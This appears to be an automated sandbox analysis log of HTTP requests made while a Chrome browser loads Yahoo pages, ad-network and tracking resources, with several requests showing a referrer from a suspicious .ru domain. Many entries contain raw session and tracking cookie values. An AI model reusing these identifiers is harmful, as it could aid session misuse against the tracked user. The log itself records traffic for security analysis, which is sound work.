Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=3478411438996106&correlator=2098711035967007&eid=31087349&output=ldjh&gdfp_req=1&vrg=202409240101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyhp%2Cmain%2Cdt%2Cus_yhp_main_dt_top_right%2Cus_yhp_main_dt_top_center%2Cus_yhp_main_dt_as_mid_right_a%2Cus_yhp_main_dt_as_mid_right_b&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5%2C%2F0%2F1%2F2%2F3%2F4%2F6%2C%2F0%2F1%2F2%2F3%2F4%2F7%2C%2F0%2F1%2F2%2F3%2F4%2F8&prev_iu_szs=300x250%7C300x600%2C970x250%7C3x1%7C728x90%2C300x250%2C300x250&ifi=1&sfv=1-0-40&fsfs=1%2C1%2C1%2C1&fsbs=1%2C1%2C1%2C1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1727716874857&adxs=951%2C147%2C951%2C951&adys=1172%2C209%2C2285%2C2035&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=1%7C0%7C2%7C3&ucis=1%7C2%7C3%7C4&oid=2&u_his=2&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Fwww.yahoo.com%2F&ref=https%3A%2F%2Fhfj.rontishet.ru%2F&vis=1&psz=292x2541%7C1280x270%7C300x540%7C300x540&msz=292x600%7C1280x270%7C300x250%7C300x0&fws=4%2C2052%2C132%2C132&ohw=1263%2C1263%2C300%2C300&td=1&egid=1261&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1727716854808&idt=8298&prev_scp=loc%3Dtop_right%7Cloc%3Dtop_center%7Cloc%3Dmid_right_a%7Cloc%3Dmid_right_b&cust_params=bucket%3D900%252Cseamless%26cobrand%3Dnone%26colo%3Dbf1%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfp%26ver%3Dmegastrm%26usercountry%3DUS%26pt%3Dhome%26spaceid%3D2023538075%26yrid%3D1pa4ckpjflnfm%26bka%3D0%26ay_floor_g%3Dmodel%2520not%2520loaded%26ay_floor_m%3Dmodel%2520not%2520loaded%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1481106528%2C3690920304%2C3064630007%2C3845938001&frm=20&eoidce=1 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Browsing-Topics: ();p=P0000000000000000000000000000000Sec-Ad-Auction-Fetch: ?1Origin: https://www.yahoo.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /safeframe/1-0-40/html/container.html HTTP/1.1Host: f665d8114e8c2c904180d9ba9ec2b7b1.safeframe.googlesyndication.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eh/prebid-config/bp-fp.json HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cookie_sync HTTP/1.1Host: pbs.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /yahooweb-network/pmk-20220605.1.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /g/images/spaceball.gif HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /screener/predefined/ms_basic_materials/ HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-games.custom.modern.5043a481c515b36358c32b8ea2d581fe.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1727716872500&did=did-004f&se=e30&duid=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&refr=https%3A%2F%2Fhfj.rontishet.ru%2F&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lidid=8ee0c49b-140c-40eb-9a80-81eb1f667bc5; lidid=8ee0c49b-140c-40eb-9a80-81eb1f667bc5
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-tabs-1.12.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lr_sync HTTP/1.1Host: pbs.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /sectors/basic-materials HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /yahooweb-network/pmk-20220605.1.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /libtrc/google-topics-api.20240929-12-RELEASE.es6.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /g/images/spaceball.gif HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/pv/perf-vitals_3.3.0.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-start-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-games.custom.modern.5043a481c515b36358c32b8ea2d581fe.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-result-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-tabs-1.12.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /data/analytics HTTP/1.1Host: pbd.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-error-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-close-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_CLOUDY_DAY.svg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=3478411438996106&correlator=2098711035967007&eid=31087349&output=ldjh&gdfp_req=1&vrg=202409240101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyhp%2Cmain%2Cdt%2Cus_yhp_main_dt_top_right%2Cus_yhp_main_dt_top_center%2Cus_yhp_main_dt_as_mid_right_a%2Cus_yhp_main_dt_as_mid_right_b&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5%2C%2F0%2F1%2F2%2F3%2F4%2F6%2C%2F0%2F1%2F2%2F3%2F4%2F7%2C%2F0%2F1%2F2%2F3%2F4%2F8&prev_iu_szs=300x250%7C300x600%2C970x250%7C3x1%7C728x90%2C300x250%2C300x250&ifi=1&sfv=1-0-40&fsfs=1%2C1%2C1%2C1&fsbs=1%2C1%2C1%2C1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1727716874857&adxs=951%2C147%2C951%2C951&adys=1172%2C209%2C2285%2C2035&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=1%7C0%7C2%7C3&ucis=1%7C2%7C3%7C4&oid=2&u_his=2&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Fwww.yahoo.com%2F&ref=https%3A%2F%2Fhfj.rontishet.ru%2F&vis=1&psz=292x2541%7C1280x270%7C300x540%7C300x540&msz=292x600%7C1280x270%7C300x250%7C300x0&fws=4%2C2052%2C132%2C132&ohw=1263%2C1263%2C300%2C300&td=1&egid=1261&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1727716854808&idt=8298&prev_scp=loc%3Dtop_right%7Cloc%3Dtop_center%7Cloc%3Dmid_right_a%7Cloc%3Dmid_right_b&cust_params=bucket%3D900%252Cseamless%26cobrand%3Dnone%26colo%3Dbf1%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfp%26ver%3Dmegastrm%26usercountry%3DUS%26pt%3Dhome%26spaceid%3D2023538075%26yrid%3D1pa4ckpjflnfm%26bka%3D0%26ay_floor_g%3Dmodel%2520not%2520loaded%26ay_floor_m%3Dmodel%2520not%2520loaded%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1481106528%2C3690920304%2C3064630007%2C3845938001&frm=20&eoidce=1 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: 